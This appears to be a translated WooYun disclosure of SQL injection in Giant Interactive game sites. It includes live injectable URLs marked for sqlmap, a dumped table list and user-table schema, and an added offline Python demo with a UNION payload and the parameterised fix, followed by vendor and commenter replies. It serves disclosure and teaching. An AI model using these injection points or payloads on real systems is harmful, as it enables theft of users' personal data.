Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0116607

Title: Game industry security: multiple SQL injection points across several 巨人网络 (Giant Interactive) sites (appears to be a generic issue; involves at least several million users' records, including a large amount of third-party user data)

Vendor: 巨人网络 (Giant Interactive)

Author: 管管侠

Submitted: 2015-05-27 23:12

Fixed: 2015-07-13 09:16

Published: 2015-07-13 09:16

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)


Vulnerability details

Disclosure timeline:

2015-05-27: Details sent to the vendor; awaiting vendor action
2015-05-29: Vendor confirmed; details visible to the vendor only
2015-06-08: Details opened to core white hats and domain experts
2015-06-18: Details opened to regular white hats
2015-06-28: Details opened to intern white hats
2015-07-13: Details opened to the public

Brief description:

Vendor: please read the report and confirm it, then leave a comment asking the moderators to mask the details. We do not recommend ignoring every report. OK?
Note: there are that many user tables belonging to partner third parties.

Detailed description:

Multiple SQL injection points. In each URL the trailing `*` marks the injectable `kw` parameter (sqlmap's custom injection marker).
These two share the same database:
http://tieba.xx.ztgame.com/index.php?mod=bbs&kw=1*&page=10&act=list
http://act.xx.ztgame.com/bbs/index.php?mod=bbs&act=list&kw=1*

[screenshot: 1.png]


The following one uses a separate database:
http://act.xzt.ztgame.com/lwj/index.php?mod=clan&act=zdlist&kw=1*

[screenshot: 2.png]
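The bug class behind the `kw` parameter, as an added example that is not code from the original report or from the ztgame.com site. The real target is a PHP/MySQL application; this script reproduces the same query shape (a keyword search spliced into a `LIKE`) against an in-memory SQLite database so it runs offline. `bbs_forum_post` is taken from the dumped table list and the `act_user` columns from the dumped schema, but the rows, the exact SQL of the site's handler and the helper names are assumptions constructed for the example. It shows the boolean-based check sqlmap automates for a marked parameter, a UNION payload that reads `phone` and `qq` out of `act_user` through the search, and the parameterised version of the same query on which both fail.

```python
"""Added example, not code from the original report or from ztgame's site.

Reproduces the reported injection shape (index.php?mod=bbs&act=list&kw=...)
against SQLite.  Table names come from the dumped table list and act_user's
columns from the dumped schema; rows and handler SQL are constructed here.
"""
import sqlite3
from typing import Callable, List, Tuple

Row = Tuple
Search = Callable[[str], List[Row]]

# UNION payload: reuses the two result columns of the post search to pull
# phone and qq out of act_user, then comments out the trailing "%'".
UNION_PAYLOAD = "zzz%' UNION SELECT phone, qq FROM act_user -- "


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the act_xx database."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE bbs_forum_post (id INTEGER, title TEXT, body TEXT);
        INSERT INTO bbs_forum_post VALUES
            (1, 'patch notes 1.2', 'servers back up'),
            (2, 'guild recruiting', 'join us'),
            (3, 'bug in quest 17', 'npc missing');
        CREATE TABLE act_user (id INTEGER, account TEXT, phone INTEGER, qq TEXT);
        INSERT INTO act_user VALUES
            (1, 'player_a', 13800000001, '10001'),
            (2, 'player_b', 13800000002, '10002');
        """
    )
    return con


def search_vulnerable(con: sqlite3.Connection, kw: str) -> List[Row]:
    """Assumed shape of the buggy handler: kw is spliced into the SQL text."""
    sql = "SELECT id, title FROM bbs_forum_post WHERE title LIKE '%" + kw + "%'"
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, kw: str) -> List[Row]:
    """Fix: bind kw as a parameter so it is treated as data, never as SQL."""
    sql = "SELECT id, title FROM bbs_forum_post WHERE title LIKE ?"
    return con.execute(sql, ("%" + kw + "%",)).fetchall()


def boolean_probe(search: Search, base: str) -> bool:
    """Boolean-based check of the kind sqlmap runs on a marked parameter.

    Injectable if appending a true condition leaves the result unchanged
    while a false condition changes it.  Against a parameterised query both
    probes are literal text and return the same (empty) result.
    """
    plain = search(base)
    true_ = search(base + "%' AND '1'='1' -- ")
    false_ = search(base + "%' AND '1'='2' -- ")
    return true_ == plain and false_ != plain


if __name__ == "__main__":
    db = make_db()
    print("vulnerable injectable:", boolean_probe(lambda k: search_vulnerable(db, k), "1"))
    print("safe injectable:      ", boolean_probe(lambda k: search_safe(db, k), "1"))
    print("UNION via vulnerable: ", search_vulnerable(db, UNION_PAYLOAD))
    print("UNION via safe:       ", search_safe(db, UNION_PAYLOAD))
```

Parameter binding closes the injection, but note that `%` and `_` in `kw` are still `LIKE` wildcards after binding; escape them (or use an `ESCAPE` clause) if a wildcard search is not intended.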

Proof of vulnerability:

Database: act_xx
[349 tables]
+-----------------------------------+
| 7v_list |
| act_user |
| act_user_login_log |
| act_user_phone_log |
| act_user_score_log |
| active_log |
| app_config |
| app_device_user |
| app_http_log |
| app_ios_token |
| app_login_user |
| app_phone_bind_log |
| app_prize |
| app_prize_weibo_log |
| app_push_ios_log |
| app_push_log |
| article |
| bag_bonus_log |
| bag_bonus_log_v2 |
| bag_item |
| bag_item_v2 |
| bag_key |
| bag_member_address |
| bag_member_address_v2 |
| bag_v3_bonus_log |
| bag_v3_item |
| bag_v3_key |
| bag_v3_member_address |
| bag_v3_vote_chance |
| bag_vote_chance |
| bag_vote_chance_v2 |
| basicdata |
| bbs_forum |
| bbs_forum_post |
| bbs_log |
| bbs_member |
| bbs_member_action |
| bbs_member_blacklist |
| bbs_member_bonus |
| bbs_member_credit |
| bbs_member_message |
| bbs_member_message_del |
| bylot_log |
| catalogue |
| chief_code |
| chief_user |
| christmas_award |
| christmas_box_log |
| christmas_log |
| christmas_star_log |
| christmas_user |
| cjddp_award |
| cjddp_code |
| cjddp_user |
| cjddp_wlog |
| customfields |
| datapool |
| dazp_award |
| dazp_user |
| dazp_wlog |
| dbt_star |
| ddp_award |
| ddp_code |
| ddp_setting |
| ddp_slog |
| ddp_user |
| ddp_wlog |
| diaosi_phone |
| dp_logs |
| dp_msg |
| dp_point |
| dp_province |
| dp_record |
| dsapp_log |
| dsjj_file |
| dsjj_log |
| dsjj_star |
| duanwu_award |
| duanwu_log |
| duanwu_user |
| euro |
| euro_history |
| gohome_award |
| gohome_card_log |
| gohome_log |
| gohome_user |
| gowall_user |
| handbook |
| lvmama_user |
| lvmama_user_img |
| lvmama_vote_chance |
| lvmama_vote_log |
| lwj_login_log |
| maidan_card |
| maidan_chance |
| maidan_index_count |
| maidan_log |
| maidan_user |
| maidan_v3_bonus_log |
| maidan_v3_item |
| maidan_v3_key |
| maidan_v3_key_jd |
| maidan_v3_user |
| maidan_v4_bonus_log |
| maidan_v4_item |
| maidan_v4_key |
| maidan_v4_key_jd |
| maidan_v4_user |
| mmanchor_comment |
| mmanchor_list |
| mmanchor_log |
| mmshow_list |
| mmshow_log |
| mmshow_v10_list |
| mmshow_v2_list |
| mmshow_v2_log |
| mmshow_v3_list |
| mmshow_v3_log |
| mmshow_v4_list |
| mmshow_v4_log |
| mmshow_v5_list |
| mmshow_v6_list |
| mmshow_v7_list |
| mmshow_v7_log |
| mmshow_v8_list |
| mmshow_v9_list |
| mmvote_user |
| phone_20140619 |
| pk_login_log |
| pk_news |
| pk_say |
| pk_section |
| pkvote_info |
| pkvote_user |
| reg_phone |
| reg_sns |
| reward_award |
| reward_list |
| shaitu_list |
| shaitu_wlog |
| shengxiao_award |
| shengxiao_award_20131218 |
| shengxiao_log |
| shengxiao_log_20131218 |
| shengxiao_log_temp |
| shengxiao_log_temp_2 |
| snl_award |
| snl_code |
| snl_log |
| snl_star |
| sqserver_user |
| suggest |
| suggest_comment |
| suggest_user |
| talent_bonus_log |
| talent_items |
| talent_login_log |
| talent_user |
| talent_vote_chance |
| talent_vote_log |
| team_award |
| team_award_20130729 |
| team_award_20130805 |
| team_award_20130813 |
| team_collect_award |
| team_collect_award_20130729 |
| team_collect_award_20130805 |
| team_collect_award_20130813 |
| team_collect_log |
| team_collect_log_20130729 |
| team_collect_log_20130805 |
| team_collect_log_20130813 |
| team_collect_user |
| team_collect_user_20130729 |
| team_collect_user_20130805 |
| team_collect_user_20130813 |
| team_comment |
| team_comment_20130729 |
| team_comment_20130805 |
| team_comment_20130813 |
| team_error |
| team_error_20130729 |
| team_error_20130805 |
| team_error_20130813 |
| team_game_phone |
| team_game_phone_20130729 |
| team_game_phone_20130805 |
| team_game_phone_20130813 |
| team_list |
| team_list_20130729 |
| team_list_20130805 |
| team_list_20130813 |
| team_log |
| team_log_20130729 |
| team_log_20130805 |
| team_log_20130813 |
| team_member |
| team_member_20130729 |
| team_member_20130805 |
| team_member_20130813 |
| team_phone |
| team_phone_20130729 |
| team_phone_20130805 |
| team_phone_20130813 |
| team_user |
| team_user_20130729 |
| team_user_20130805 |
| team_user_20130813 |
| team_v2_phone |
| team_v2_phone_20130909 |
| team_v2_phone_20130922 |
| team_v2_phone_20131012 |
| team_v2_phone_20131028 |
| team_v2_phone_20131108 |
| team_v2_phone_20131209 |
| team_v2_phone_20131223 |
| team_v2_phone_20140103 |
| team_v2_phone_20140120 |
| team_v2_phone_20140214 |
| team_v2_phone_20140303 |
| team_v2_phone_20140318 |
| team_v2_phone_20140401 |
| team_v2_phone_20140414 |
| team_v2_phone_20140428 |
| team_v2_phone_20140512 |
| team_v2_team_list |
| team_v2_team_list_20130909 |
| team_v2_team_list_20130922 |
| team_v2_team_list_20131012 |
| team_v2_team_list_20131028 |
| team_v2_team_list_20131108 |
| team_v2_team_list_20131209 |
| team_v2_team_list_20131223 |
| team_v2_team_list_20140103 |
| team_v2_team_list_20140120 |
| team_v2_team_list_20140214 |
| team_v2_team_list_20140303 |
| team_v2_team_list_20140318 |
| team_v2_team_list_20140401 |
| team_v2_team_list_20140414 |
| team_v2_team_list_20140428 |
| team_v2_team_list_20140512 |
| team_v2_team_member_list |
| team_v2_team_member_list_20130909 |
| team_v2_team_member_list_20130922 |
| team_v2_team_member_list_20131012 |
| team_v2_team_member_list_20131028 |
| team_v2_team_member_list_20131108 |
| team_v2_team_member_list_20131209 |
| team_v2_team_member_list_20131223 |
| team_v2_team_member_list_20140103 |
| team_v2_team_member_list_20140120 |
| team_v2_team_member_list_20140214 |
| team_v2_team_member_list_20140303 |
| team_v2_team_member_list_20140318 |
| team_v2_team_member_list_20140401 |
| team_v2_team_member_list_20140414 |
| team_v2_team_member_list_20140428 |
| team_v2_team_member_list_20140512 |
| team_v2_team_token_list |
| team_v2_team_token_list_20130909 |
| team_v2_team_token_list_20130922 |
| team_v2_team_token_list_20131012 |
| team_v2_team_token_list_20131028 |
| team_v2_team_token_list_20131108 |
| team_v2_team_token_list_20131209 |
| team_v2_team_token_list_20131223 |
| team_v2_team_token_list_20140103 |
| team_v2_team_token_list_20140120 |
| team_v2_team_token_list_20140214 |
| team_v2_team_token_list_20140303 |
| team_v2_team_token_list_20140318 |
| team_v2_team_token_list_20140401 |
| team_v2_team_token_list_20140414 |
| team_v2_team_token_list_20140428 |
| team_v2_team_token_list_20140512 |
| team_v2_team_user_list |
| team_v2_team_user_list_20130909 |
| team_v2_team_user_list_20130922 |
| team_v2_team_user_list_20131012 |
| team_v2_team_user_list_20131028 |
| team_v2_team_user_list_20131108 |
| team_v2_team_user_list_20131209 |
| team_v2_team_user_list_20131223 |
| team_v2_team_user_list_20140103 |
| team_v2_team_user_list_20140120 |
| team_v2_team_user_list_20140214 |
| team_v2_team_user_list_20140303 |
| team_v2_team_user_list_20140318 |
| team_v2_team_user_list_20140401 |
| team_v2_team_user_list_20140414 |
| team_v2_team_user_list_20140428 |
| team_v2_team_user_list_20140512 |
| team_v2_weibo_log |
| team_v2_weibo_log_20130909 |
| team_v2_weibo_log_20130922 |
| team_v2_weibo_log_20131012 |
| team_v2_weibo_log_20131028 |
| team_v2_weibo_log_20131108 |
| team_v2_weibo_log_20131209 |
| team_v2_weibo_log_20131223 |
| team_v2_weibo_log_20140103 |
| team_v2_weibo_log_20140120 |
| team_v2_weibo_log_20140214 |
| team_v2_weibo_log_20140303 |
| team_v2_weibo_log_20140318 |
| team_v2_weibo_log_20140401 |
| team_v2_weibo_log_20140414 |
| team_v2_weibo_log_20140428 |
| team_v2_weibo_log_20140512 |
| team_v3_login_log |
| team_v3_phone |
| team_v3_phone_new |
| team_v3_prize |
| toughguy_apply |
| treasure_code |
| treasure_log |
| treasure_user |
| treasure_wlog |
| tzh_list |
| tzh_log |
| upload |
| v8_reg_log |
| vocation_vote |
| wish_code |
| wish_log |
| wish_user |
| wish_wlog |
| xgdd_users |
| xx_api_log |
| xx_yidong |
| ydteam_award |
| ydteam_collect_award |
| ydteam_collect_log |
| ydteam_comment |
| ydteam_error |
| ydteam_game_phone |
| ydteam_list |
| ydteam_log |
| ydteam_member |
| ydteam_phone |
| ydteam_user |
| yuanxiao_award |
| yuanxiao_log |
| yuanxiao_user |
| zp_code |
| zp_user |
| zp_useraward |
| zp_userchancelog |
+-----------------------------------+
Database: act_xx
Table: act_user
[13 columns]
+----------+---------------------+
| Column | Type |
+----------+---------------------+
| accid | int(11) unsigned |
| account | varchar(50) |
| address | varchar(255) |
| birth | int(10) unsigned |
| cdate | date |
| city | int(5) unsigned |
| id | int(11) unsigned |
| ldate | date |
| phone | int(11) unsigned |
| province | int(2) unsigned |
| qq | varchar(12) |
| score | int(10) unsigned |
| sex | tinyint(1) unsigned |
+----------+---------------------+

[screenshot: 3.png]


act_user alone holds detailed records for 1.67 million+ users; I did not read the other user tables one by one. That is enough to demonstrate the impact.

Remediation:

A vendor that quietly patches without confirming the report is what we call an "unscrupulous vendor".
Recommend auditing every business line that uses this system; the issue is most likely generic across them.

Copyright notice: when reposting, please credit the source: 管管侠@乌云


Vendor response

Vendor reply:

Severity: Medium

Vulnerability Rank: 5

Confirmed at: 2015-05-29 09:14

Vendor comment:

This vulnerability has been confirmed; we are evaluating the fix.

Latest status:

None

Vulnerability ratings:

Comments

  1. 2015-05-27 23:55 | 小龙 ( regular white hat | Rank: 1208, vulnerabilities: 316 | "There's a group of people on WooYun who learn skills on WooYun and then go to some..." )

    That's one long title.

  2. 2015-05-28 01:31 | mango ( core white hat | Rank: 1668, vulnerabilities: 248 | "I have a dumb girlfriend!" )

    Bold!!

  3. 2015-05-28 02:01 | 小龙 ( regular white hat | Rank: 1208, vulnerabilities: 316 | "There's a group of people on WooYun who learn skills on WooYun and then go to some..." )

    @mango Big shot, you should post one too, haha.

  4. 2015-05-28 10:37 | mango ( core white hat | Rank: 1668, vulnerabilities: 248 | "I have a dumb girlfriend!" )

    @小龙 = = Seeing all of these get ignored... it's kind of painful.

  5. 2015-05-28 11:53 | 管管侠 ( core white hat | Rank: 1368, vulnerabilities: 108 | "Taking a few days off; you lot get to show off for a while!!!" )

    I'm the reporter. If the vendor reads this and still doesn't confirm it, I won't submit the rest of their vulnerabilities I'm holding, heh.

  6. 2015-05-29 09:55 | 管管侠 ( core white hat | Rank: 1368, vulnerabilities: 108 | "Taking a few days off; you lot get to show off for a while!!!" )

    At least three injection points and they give it 5 points; might as well have ignored it. Tell me how I'm supposed to submit the rest of your vulnerabilities.

  7. 2015-05-31 10:28 | qhwlpg ( regular white hat | Rank: 226, vulnerabilities: 54 | "Focused on code auditing." )

    What happened to the promised travel-industry security, @管管侠?

  8. 2015-06-01 10:37 | 巨人网络 (WooYun vendor)

    @管管侠 Thank you very much for your timely report; we take it very seriously. Unfortunately the colleague who scored it last week did not really understand the significance of Rank, so the evaluation was not objective, and we feel bad about that. If we have the chance to receive your reports again, we will definitely give a high score.

  9. 2015-06-01 10:44 | 管管侠 ( core white hat | Rank: 1368, vulnerabilities: 108 | "Taking a few days off; you lot get to show off for a while!!!" )
  10. 2015-07-13 09:41 | 牛 小 帅 ( regular white hat | Rank: 363, vulnerabilities: 84 | "[code] If the heart has no place to rest, wherever you go you are..." )

    @管管侠 Thank you very much for your timely report; we take it very seriously. Unfortunately the colleague who scored it last week did not really understand the significance of Rank, so the evaluation was not objective, and we feel bad about that. If we have the chance to receive your reports again, we will definitely keep giving low scores.

  11. 2015-07-13 12:53 | 盛大网络 (WooYun vendor)

    Feels like it's coming.

  12. 2015-07-13 16:21 | Me_Fortune ( regular white hat | Rank: 209, vulnerabilities: 71 | "I'm Me_Fortune" )

    @盛大网络 What is it you feel coming - -

  13. 2015-07-14 00:26 | 黑暗游侠 ( regular white hat | Rank: 1780, vulnerabilities: 268 | "123" )

    @管管侠 Thank you very much for your timely report; we take it very seriously. Unfortunately the colleague who scored it last week did not really understand the significance of Rank, so the evaluation was not objective, and we feel bad about that. If we have the chance to receive your reports again, we will definitely give a high score.